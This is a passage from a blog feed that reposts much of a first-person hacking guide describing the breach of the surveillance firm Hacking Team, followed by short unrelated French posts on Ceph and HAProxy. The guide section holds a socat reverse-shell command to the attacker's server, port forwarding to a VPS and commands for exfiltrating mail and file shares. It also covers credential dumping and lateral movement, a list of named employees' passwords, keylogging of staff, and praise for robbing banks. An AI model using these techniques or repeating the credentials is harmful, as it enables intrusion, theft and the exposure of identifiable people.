vulnerabilities [1]. Hacking Team had one public IP range:
inetnum:        93.62.139.32 - 93.62.139.47
descr:          HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn&amp;#39;t find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven&amp;#39;t been patched, I won&amp;#39;t give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


--[ 6 - Be Prepared ]-----------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I&amp;#39;d prepared were:

1) busybox

   For all the standard Unix utilities that the system didn&amp;#39;t have.

2) nmap

   To scan and fingerprint Hacking Team&amp;#39;s internal network.

3) Responder.py

   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.

4) Python

   To execute Responder.py

5) tcpdump

   For sniffing traffic.

6) dsniff

   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team&amp;#39;s own ALoR
   and NaGA, but it was hard to compile it for the system.

7) socat

   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:&amp;#39;bash -li&amp;#39;,pty,stderr,setsid,sigint,sane \
		  tcp:my_server:my_port

   And useful for a lot more, it&amp;#39;s a networking swiss army knife. See the
   examples section of its documentation.

8) screen

   Like the shell with pty, it wasn&amp;#39;t really necessary, but I wanted to feel
   at home in Hacking Team&amp;#39;s network.

9) a SOCKS proxy server

   To use with proxychains to be able to access their local network from any
   program.

10) tgcd

   For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team&amp;#39;s network.


--[ 7 - Watch and Listen ]------------------------------------------------------

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.


--[ 8 - NoSQL Databases ]-------------------------------------------------------

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they&amp;#39;d finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team&amp;#39;s
internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_    version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


--[ 9 - Crossed Cables ]--------------------------------------------------------

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn&amp;#39;t very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI needs a kernel module, and it would&amp;#39;ve been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we&amp;#39;ve unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


--[ 10 - From backups to domain admin ]-----------------------------------------

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient &amp;#39;//192.168.100.51/c$&amp;#39; -U &amp;#39;hackingteam.local/besadmin%bes32678!!!&amp;#39;

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit&amp;#39;s psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran &amp;#34;load kiwi&amp;#34; [5], &amp;#34;creds_wdigest&amp;#34;, and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      &amp;lt;---- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&amp;amp;Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&amp;amp;2E
HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


--[ 11 - Downloading the mail ]-------------------------------------------------

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there&amp;#39;s a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell&amp;#39;s date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge &amp;#39;05/06/2015&amp;#39;) -or (Sent -ge &amp;#39;05/06/2015&amp;#39;)}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can&amp;#39;t have a month above 12). It seems like Microsoft&amp;#39;s engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


--[ 12 - Downloading Files ]----------------------------------------------------

Now that I&amp;#39;d gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient &amp;#39;//192.168.1.230/FAE DiskStation&amp;#39; \
    -U &amp;#39;HACKINGTEAM/Administrator%uu8dd8ndd12!&amp;#39; -Tc FAE_DiskStation.tar &amp;#39;*&amp;#39;

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.


--[ 13 - Introduction to hacking windows domains ]------------------------------

Before continuing with the story of the &amp;#34;weones culiaos&amp;#34; (Hacking Team), I
should give some general knowledge for hacking windows networks.


----[ 13.1 - Lateral Movement ]-------------------------------------------------

I&amp;#39;ll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for &amp;#34;in place&amp;#34; movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote Movement:

1) psexec

   The tried and true method for lateral movement on windows. You can use
   psexec [1], winexe [2], metasploit&amp;#39;s psexec_psh [3], Powershell Empire&amp;#39;s
   invoke_psexec [4], or the builtin windows command &amp;#34;sc&amp;#34; [5]. For the
   metasploit module, powershell empire, and pth-winexe [6], you just need the
   hash, not the password. It&amp;#39;s the most universal method (it works on any
   windows computer with port 445 open), but it&amp;#39;s also the least stealthy.
   Event type 7045 &amp;#34;Service Control Manager&amp;#34; will appear in the event logs. In
   my experience, no one has ever noticed during a hack, but it helps the
   investigators piece together what the hacker did afterwards.

2) WMI

   The most stealthy method. The WMI service is enabled on all windows
   computers, but except for servers, the firewall blocks it by default. You
   can use wmiexec.py [7], pth-wmis [6] (here&amp;#39;s a demonstration of wmiexec and
   pth-wmis [8]), Powershell Empire&amp;#39;s invoke_wmi [9], or the windows builtin
   wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

   It&amp;#39;s disabled by default, and I don&amp;#39;t recommend enabling new protocols.
   But, if the sysadmin has already enabled it, it&amp;#39;s very convenient,
   especially if you use powershell for everything (and you should use
   powershell for almost everything, it will change [11] with powershell 5 and
   windows 10, but for now powershell makes it easy to do everything in RAM,
   avoid AV, and leave a small footprint)

4) Scheduled Tasks

   You can execute remote programs with at and schtasks [5]. It works in the
   same situations where you could use psexec, and it also leaves a well known
   footprint [12].

5) GPO

   If all those protocols are disabled or blocked by the firewall, once you&amp;#39;re
   Domain Admin, you can use GPO to give users a login script, install an msi,
   execute a scheduled task [13], or, like we&amp;#39;ll see with the computer of
   Mauro Romeo (one of Hacking Team&amp;#39;s sysadmins), use GPO to enable WMI and
   open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


&amp;#34;In place&amp;#34; Movement:

1) Token Stealing

   Once you have admin access on a computer, you can use the tokens of the
   other users to access resources in the domain. Two tools for doing this are
   incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

   You can take advantage of a validation bug in Kerberos to generate Domain
   Admin tickets [3][4][5].

3) Pass the Hash

   If you have a user&amp;#39;s hash, but they&amp;#39;re not logged in, you can use
   sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

   Any RAT can inject itself into other processes. For example, the migrate
   command in meterpreter and pupy [6], or the psinject [7] command in
   powershell empire. You can inject into the process that has the token you
   want.

5) runas

   This is sometimes very useful since it doesn&amp;#39;t require admin privileges.
   The command is part of windows, but if you don&amp;#39;t have a GUI you can use
   powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]------------------------------------------------------

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn&amp;#39;t needed since companies never
sleep. I always use Duqu 2 style &amp;#34;persistence&amp;#34;, executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it&amp;#39;s not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]------------------------------------------

The best tool these days for understanding windows networks is Powerview [1].
It&amp;#39;s worth reading everything written by it&amp;#39;s author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
&amp;#34;net view&amp;#34;. Other techniques that I like are:

1) Downloading a list of file names

   With a Domain Admin account, you can download a list of all filenames in
   the network with powerview:

   Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
   select-string &amp;#39;^(.*) \t-&amp;#39; | %{dir -recurse $_.Matches[0].Groups[1] |
   select fullname | out-file -append files.txt}

   Later, you can read it at your leisure and choose which files to download.

2) Reading email

   As we&amp;#39;ve already seen, you can download email with powershell, and it has a
   lot of useful information.

3) Reading sharepoint

   It&amp;#39;s another place where many businesses store a lot of important
   information. It can also be downloaded with powershell [10].

4) Active Directory [11]

   It has a lot of useful information about users and computers. Without being
   Domain Admin, you can already get a lot of info with powerview and other
   tools [12]. After getting Domain Admin, you should export all the AD
   information with csvde or another tool.

5) Spy on the employees

   One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
   (one of Hacking Team&amp;#39;s sysadmins) gave me access to a Nagios server which
   gave me access to the rete sviluppo (development network with the source
   code of RCS). With a simple combination of Get-Keystrokes and
   Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
   [14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the &amp;#34;Rete Sviluppo&amp;#34;, an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I&amp;#39;d
already gotten admin access. Mauro Romeo&amp;#39;s computer didn&amp;#39;t have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he&amp;#39;d mounted it and then copied off the
files. Many have made fun of Christian Pozzi&amp;#39;s weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Within Christian Pozzi&amp;#39;s Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I&amp;#39;d found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it&amp;#39;s an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I&amp;#39;d seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the &amp;#34;forgot my password&amp;#34; function along with
my access to their mail server to reset the passwords.


--[ 17 - Conclusion ]-----------------------------------------------------------

That&amp;#39;s all it takes to take down a company and stop their human rights abuses.
That&amp;#39;s the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don&amp;#39;t attack systems you
don&amp;#39;t have permission to, etc. I&amp;#39;ll say the same, but with a more rebellious
conception of &amp;#34;ethical&amp;#34; hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves &amp;#34;ethical hackers&amp;#34; just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I&amp;#39;d like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]--------------------------------------------------------------

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----



                      If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   &amp;lt;  | |_) | (_| | (__|   &amp;lt;|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
&lt;/code&gt;&lt;/pre&gt;</content>
    </item>
    
    <item>
      <title>CEPH jewel is out</title>
      <link>https://www.lamy.im/posts/ceph-jewel-is-out/</link>
      <pubDate>Fri, 22 Apr 2016 10:52:19 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/ceph-jewel-is-out/</guid>
      <description>La version 10.2.0 de CEPH est sortie il y a quelques jours avec une bonne nouvelle, CEPHFS est stable et prêt pour la production.
CEPHFS est a mon sens une brique fonctionnelle qui manquait rendre CEPH plus versatile et faire accélérer son adoption.
Le support de RHEL6 est abandonné a partir de cette version.
Plus d’info sur la release note:
http://ceph.com/releases/v10-2-0-jewel-released/</description>
      <content>&lt;p&gt;La version 10.2.0 de CEPH est sortie il y a quelques jours avec une bonne nouvelle, CEPHFS est stable et prêt pour la production.&lt;/p&gt;
&lt;p&gt;CEPHFS est a mon sens une brique fonctionnelle qui manquait rendre CEPH plus versatile et faire accélérer son adoption.&lt;/p&gt;
&lt;p&gt;Le support de RHEL6 est abandonné a partir de cette version.&lt;/p&gt;
&lt;p&gt;Plus d’info sur la release note:&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://ceph.com/releases/v10-2-0-jewel-released/&#34;&gt;http://ceph.com/releases/v10-2-0-jewel-released/&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>twitter et les images</title>
      <link>https://www.lamy.im/posts/twitter-et-les-images/</link>
      <pubDate>Fri, 22 Apr 2016 10:12:30 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/twitter-et-les-images/</guid>
      <description>olé,
highscalability a publié un post intéressant sur la façon dont twitter gère les images, les problématiques rencontrées et les améliorations apportées.
http://highscalability.com/blog/2016/4/20/how-twitter-handles-3000-images-per-second.html</description>
      <content>&lt;p&gt;olé,&lt;/p&gt;
&lt;p&gt;highscalability a publié un post intéressant sur la façon dont twitter gère les images, les problématiques rencontrées et les améliorations apportées.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;http://highscalability.com/blog/2016/4/20/how-twitter-handles-3000-images-per-second.html&#34;&gt;http://highscalability.com/blog/2016/4/20/how-twitter-handles-3000-images-per-second.html&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>HAproxy 1.6 sur debian 8 avec keepalived</title>
      <link>https://www.lamy.im/posts/haproxy-1-6-sur-debian-8-avec-keepalived/</link>
      <pubDate>Mon, 19 Oct 2015 08:39:05 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/haproxy-1-6-sur-debian-8-avec-keepalived/</guid>
      <description>HAproxy 1.6 is out !
Parlons de son installation avec keepalived qui va gerer noter bascule de VIP.
Keepalived va s’occuper de la bascule de VIP via VRRP.
installation des paquets
Installons HAproxy 1.6 grace aux dépots de http://haproxy.debian.net/
$ apt install keepalived haproxy Autorisons linux à utiliser une adresse non localement configurée
$ echo &amp;#34;net.ipv4.ip_nonlocal_bind=1&amp;#34; &amp;gt;&amp;gt; /etc/sysctl.conf $ sysctl -p keepalived configuration, /etc/keepalived/keepalived.conf
Le fichier de configuration est commenté avec les information de la manpage que je vous invite a lire.</description>
      <content>&lt;p&gt;HAproxy 1.6 is out !&lt;br&gt;
Parlons de son installation avec keepalived qui va gerer noter bascule de VIP.&lt;br&gt;
Keepalived va s’occuper de la bascule de VIP via VRRP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;installation des paquets&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Installons HAproxy 1.6 grace aux dépots de &lt;a href=&#34;http://haproxy.debian.net/&#34;&gt;http://haproxy.debian.net/&lt;/a&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ apt install keepalived haproxy
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Autorisons linux à utiliser une adresse non localement configurée&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;
$ echo &amp;#34;net.ipv4.ip_nonlocal_bind=1&amp;#34; &amp;gt;&amp;gt; /etc/sysctl.conf
$ sysctl -p
